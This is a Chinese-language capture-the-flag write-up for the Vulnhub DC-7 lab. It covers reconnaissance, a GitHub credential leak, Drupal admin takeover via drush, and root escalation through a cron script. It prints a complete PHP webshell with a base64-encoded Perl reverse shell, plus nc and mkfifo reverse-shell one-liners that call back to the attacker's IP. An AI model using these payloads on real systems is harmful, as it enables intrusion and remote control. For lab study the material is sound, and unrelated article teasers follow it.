[Vulnhub] DC-7

news2024/11/17 13:33:35

下载链接:https://download.vulnhub.com/dc/DC-7.zip

  • git信息泄露
  • Drupal-CMS 拿shell
  • nc反弹shell
  • 反弹shell写入root用户的cron定时任务,root执行提权

目录

<1> 信息搜集

(1) nmap扫靶机ip&端口服务

(2) github上DC-7项目信息泄露

<2> 反弹shell

(1) ssh登录dc7user

(2)drush命令修改admin密码

<3> Privilege Escalation(写入cron定时任务提权)


<1> 信息搜集

(1) nmap扫靶机ip&端口服务

扫一下靶机的ip

nmap -sP 192.168.236.0/24 扫描一下靶机ip

靶机ip: 192.168.236.137

nmap -A -p 1-65535 192.168.236.137 扫描一下靶机开放哪些服务

 80端口开放了一个 Drupal 8服务,/user/login里有登录框  /user/password是重置密码

Drupal简介:

        Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和
PHP开发框架(Framework)共同组成。
        形象地说,Drupal是一个附带CMS的PHP开发框架

这里根据之前的描述,感觉有点像DC-1靶机了,不过DC-1是Drupal7 

CMS Drupal8 存在(CVE-2018-7600) 

msfconsole 里利用CVE-2018-7600 没成功

(2) github上DC-7项目信息泄露

While this challenge isn't all that technical  不完全是技术性的 跳出一贯暴力破解用户登录的思维

 可以看见左下角有一个 @DC7USER     搜索一下,发现github上有一个repo

 里面泄露了源码,github信息泄露

 同时 在config.php配置文件里,获得了username和password:MdR3xOgB7#dW

	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";

<2> 反弹shell

(1) ssh登录dc7user

/user/login登录不了,试着ssh登录,成功登录

 去home目录搜集一下其他信息,发现说有一个mail

查看一下

From root@dc-7 Mon Jan 30 17:15:14 2023
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Mon, 30 Jan 2023 17:15:14 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1pMONm-0000HT-Rv
	for root@dc-7; Mon, 30 Jan 2023 17:15:14 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1pMONm-0000HT-Rv@dc-7>
Date: Mon, 30 Jan 2023 17:15:14 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Mon Jan 30 17:30:07 2023
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Mon, 30 Jan 2023 17:30:07 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1pMOcB-0000I7-I8
	for root@dc-7; Mon, 30 Jan 2023 17:30:07 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1pMOcB-0000I7-I8@dc-7>
Date: Mon, 30 Jan 2023 17:30:07 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Mon Jan 30 17:45:10 2023
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Mon, 30 Jan 2023 17:45:10 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1pMOqk-0000Ij-42
	for root@dc-7; Mon, 30 Jan 2023 17:45:10 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1pMOqk-0000Ij-42@dc-7>
Date: Mon, 30 Jan 2023 17:45:10 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Mon Jan 30 18:00:11 2023
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Mon, 30 Jan 2023 18:00:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1pMP5H-0000Jc-T2
	for root@dc-7; Mon, 30 Jan 2023 18:00:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1pMP5H-0000Jc-T2@dc-7>
Date: Mon, 30 Jan 2023 18:00:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

应该是一个15分钟的定时任务 Cron

Subject: Cron <root@dc-7> /opt/scripts/backups.sh

查看一下 Subject: Cron <root@dc-7> /opt/scripts/backups.sh 内容

#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

这是root的定时任务执行的shell脚本文件,我们可以将命令写入这个文件以root执行,从而提权,但是dc7user没有权限执行,,www-data可以。我们去搞一个www-data的shell

(2)drush命令修改admin密码

drush是Drupal shell 专门管理drupal站点的shell

这个命令需要先切换到drupal的目录  /var/www/html

查看用户信息

drush user-information admin,dc7user

修改密码

drush upwd admin --password="****"

 修改admin密码为 123456

回到/user/login后台  登录Drupal站点

找到上传路径Content/Add content/Basic page下,创建PHP代码反弹shell,但发现只有html解析器,没有php解析器。我们去extend那一栏 install

PHP解释器Drupal官方连接

https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz

下载成功后在extend中启动php filter

 再回到Content去写入webshell的php代码

<?php
function which($pr) {

    $path = execute("which $pr");

    return ($path ? $path : $pr);

}

function execute($cfe) {

    $res = '';

    if ($cfe) {

        if(function_exists('exec')) {

            @exec($cfe,$res);

            $res = join("\n",$res);

        } elseif(function_exists('shell_exec')) {

            $res = @shell_exec($cfe);

        } elseif(function_exists('system')) {

            @ob_start();

            @system($cfe);

            $res = @ob_get_contents();

            @ob_end_clean();

        } elseif(function_exists('passthru')) {

            @ob_start();

            @passthru($cfe);

            $res = @ob_get_contents();

            @ob_end_clean();

        } elseif(@is_resource($f = @popen($cfe,"r"))) {

            $res = '';

            while(!@feof($f)) {

                $res .= @fread($f,1024);

            }

            @pclose($f);

        }

    }

    return $res;

}

function cf($fname,$text){

    if($fp=@fopen($fname,'w')) {

        @fputs($fp,@base64_decode($text));

        @fclose($fp);

    }

}

$yourip = "192.168.236.128"; #注意这里是kali的ip

$yourport = '4444';

$usedb = array('perl'=>'perl','c'=>'c');

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

    "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

    "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

    "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

    "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

    "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

    "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

cf('/tmp/.bc',$back_connect);

$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");

?>

 拿到shell,转为交互式

python -c 'import pty;pty.spawn("/bin/bash")' 

<3> Privilege Escalation(写入cron定时任务提权)

 拿到www-data的shell之后,利用root的定时任务进行提权

我们可以往 backups.sh 里写入反弹shell的命令

方法1
echo "nc 192.168.236.128 -e /bin/bash 1234" >> backups.sh
nc -lvvp 1234
 
方法2
#有些操作系统的netcat不支持-e参数,这时候可以利用管道符命令mkfifo配合nc进行反弹shell
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.236.128 1234 >/tmp/f" >> backups.sh
nc -lvvp 1234

成功写入:

kali开启监听 nc -lvvp 1234 等待root的每十五分钟定时任务去执行 /opt/scripts/backups.sh  即可获得root的shell

python -c 'import pty;pty.spawn("/bin/bash");'   转化为交互式

ps:十五分钟挺长的,,第一次写入好像出了点问题 invalid port /bin/bash  又等了十五分钟

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/186236.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

洛谷 P1417 烹调方案 01背包题解 动态规划

真的好久没有写题解了 上次写还是在上次呢 先赞后看好习惯&#xff01; 昨天打了一月份的USACO(美国信奥赛) 给我一个感触&#xff08;也算是感想吧&#xff09;&#xff1a; 我是蒟蒻 我是蒟蒻 我是蒟蒻 我是蒟蒻 水内容&#xff08;&#xff09; 言归正传看今天这道题 题…

电脑键盘打字错乱怎么办?按键混乱的5种解决方法

有人问电脑无故乱打字&#xff0c;明明按的正确的键&#xff0c;打出来的却是错误的字母。换个键盘是不是就能解决呢&#xff1f; 不过如果你的手边恰好没有新键盘&#xff0c;又立刻要用电脑&#xff0c;可以先试试下面的5种方法。 重新连接键盘和电脑禁用键盘上的Num Lock运…

爬虫进阶(web逆向之b站)

文章目录 简介分析nowh5获取动态参数模拟 now模拟 h5小结简介 前面在《web逆向初步》练习了一些 JS 加密操作,这篇进入基础实战部分,通过给b沾刷播放量的例子,体会逆向的作用!当然,这里不是恶意刷流量,而是通过程序模拟一个正常用户,给视频增加一次播放量分析 一个正常用…

【深度学习框架-Paddle】丝滑安装PaddlePaddle,无缝衔接使用多卡

目录Paddle爱恨史PaddleCloud多卡Paddle爱恨史 Paddle是由百度开发的国内的深度学习框架&#xff0c;PaddlePaddle支撑了PaddleOCR、PaddleNLP等一系列领域内的开源工具包&#xff0c;为国内深度学习的落地与实践做出了大量贡献。 但是&#xff0c;PaddlePaddle安装问题一直都…

wpa_supplicant EAPOL状态机分析

协议 EEE 802.1X-2004协议&#xff1a;基于端口的网络接入控制协议&#xff08;port based network access control protocol&#xff09;。在LAN口对所接入的用户设备进行认证和控制&#xff0c;如果通过认证则端口打开&#xff0c;可以访问局域网中的资源。 状态机设计原理…

TYPE-C接口引脚详解

Type-C口有4对TX/RX分线&#xff0c;2对USBD/D-&#xff0c;一对SBU&#xff0c;2个CC&#xff0c;另外还有4个VBUS和4个地线。 1、当Type-C接口仅用作传输DP信号时&#xff0c;则可利用4对TX/RX&#xff0c;从而实现4Lane传输&#xff0c;这种模式称为DPonly模式&#xff1b;…

如何对项目健康度进行测量?评估项目健康状况

项目驱动变革&#xff0c;大部分公司逐步由运营驱动转变为项目驱动&#xff0c;带来更多重新和商业价值。对组织而言&#xff0c;从商业角度看&#xff0c;项目旨在推动组织从一个状态转到另一个状态&#xff0c;从而达成特定目标。项目的健康情况如何关乎项目和变革的成本&…

生成package.json文件报错“系统找不到指定的路径”

文章目录一、提出问题二、解决问题一、提出问题 package.json文件作为Web工程的入口&#xff0c;到底有多少配置是和我们的日常开发相关的&#xff1f;使用npm或yarn命令生成一个最简单的package.json文件。在命令行执行命令&#xff1a;yarn init -y 执行命令hadoop version也…

IB数学还能做什么IA

苦恼着不知道怎么写数学科IA。对呀&#xff0c;数学不就是做做题&#xff0c;算算数吗&#xff0c;加减乘除神马的&#xff0c;到底还可以做什么课题&#xff01;&#xff1f; 第一问&#xff1a;“到底怎么才是一个没有bug的数学IA题目呢&#xff1f;” 面对这个问题&#xff…

快速构建和安装干净的 ESXi 8 镜像指南

申请的 ESXi 8 的免费授权到了&#xff0c;所以趁着春节假期最后一天&#xff0c;折腾一把。这篇文档支持 ESXi 8 及以下版本的安装镜像构建&#xff0c;无需麻烦的依赖安装和解决环境问题。 相比较安装运行网上已经构建好的黑盒镜像&#xff0c;为什么不自己进行构建呢&#…

ARM uboot 主Makefile 分析

一、uboot 主Makefile分析1 1、uboot version 确定&#xff08;Makefile 的 24-29 行&#xff09; (1) uboot 的版本号分 3 个级别&#xff1a; VERSION&#xff1a;主板本号 PATCHLEVEL&#xff1a;次版本号 SUBLEVEL&#xff1a;再次版本号 EXTRAVERSION : 另外附加的版本信…

Redis对不起是我肤浅了(基础和应用篇):位图(Bitmaps)的妙用和深入分析每个子命令的用法

一、前言 在Redis 4.0 版本之前&#xff0c;Redis是单线程程序&#xff0c;主要是指Redis的网络I/O线程。Redis的持久化、集群同步等操作&#xff0c;则是由另外的线程来执行的。但在Redis 4.0 版本之后&#xff0c;Redis添加了多线程的支持&#xff0c;这时的多线程主要体现在…

温湿度传感器不同输出方式的优异对比

温湿度传感器装有湿敏和热敏元件&#xff0c;多以温湿度一体式的探头作为测温元件&#xff0c;将温度和湿度信号采集出来&#xff0c;经过稳压滤波、运算放大、非线性校正、V/I转换、恒流及反向保护等电路处理后&#xff0c;转换成与温度和湿度成线性关系的电流信号或电压信号输…

1.2.2存储结构:Cache--高速缓存

1.2.2存储结构&#xff1a;Cache--高速缓存Cache--高速缓存&#xff08;相联存储器&#xff09;Cache特点Cache改善系统性能局部性原理Cache–高速缓存&#xff08;相联存储器&#xff09; CPU中的寄存器和内存对比的话&#xff0c;其容量和速度差距是非常大的&#xff0c;因此…

数据结构 - 学习笔记 - 红黑树

数据结构 - 学习笔记 - 红黑树定义简介知识点1. 结点属性2. 前驱、后继3. 旋转查找插入父结点为黑色父结点为红色1. 有4种情形只需要变色&#xff08;对应234树4结点&#xff09;1.1. 变色实现平衡1.2. 递归调整颜色2. 有4种情形需要旋转 变色&#xff08;对应234树3结点&…

[JavaWeb]CSS

目录1. CSS语法1.1 常用样式-字体颜色1.2 常用样式-边框border1.3 常用样式-字体样式1.4 常用样式-超链接去下划线1.5 常用样式-列表去除修饰2.CSS 使用三种方式2.1 在标签的 style 属性上设置 CSS 样式2.2 在head 标签中,使用style 标签来定义需要的CSS样式2.3 把 CSS 样式写成…

线程的几种状态转换

线程在一定条件下&#xff0c;状态会发生变化。线程一共有以下几种状态&#xff1a; 1、新建状态(New)&#xff1a;新创建了一个线程对象。 2、就绪状态(Runnable)&#xff1a;线程对象创建后&#xff0c;其他线程调用了该对象的start()方法。该状态的线程位于“可运行线程池…

【头歌】顺序栈的基本操作及应用

第1关&#xff1a;顺序栈的基本操作任务描述本关任务是实现顺序栈的基本操作函数&#xff0c;以实现判断栈是否为满、是否为空、求栈元素个数、进栈和出栈等功能。相关知识栈的基本概念栈是一种特殊的线性表&#xff0c;其特殊性体现在元素插入和删除运算上&#xff0c;它的插入…

Sentry SDK使用(Vue/Browser JS/Laravel)

本文介绍通过Vue/Browser JS/Laravel三个平台对接Sentry SDK。1.在vue中使用这是入门指引&#xff0c;为了了解更多&#xff0c;请查看完整文档。为了收集错误信息和采集性能数据&#xff0c;需要安装以下两个包&#xff1a;sentry/vue(Sentrys Vue SDK)sentry/tracing(instrum…

【网络安全】Wireshark过滤数据包分析TCP三次握手

利用Wireshark分析TCP三次握手和四次挥手一、安装Wireshark二、界面介绍1. 网卡类型2. 首页功能2.1 按钮界面2.2 数据包列表2.3 数据包详细信息列表3. Wireshark过滤器3.1 设置数据抓取选项3.2 显示过滤器3.3 过滤关系3.4 复合过滤表达式3.5 常见用显示过滤需求及其对应表达式3…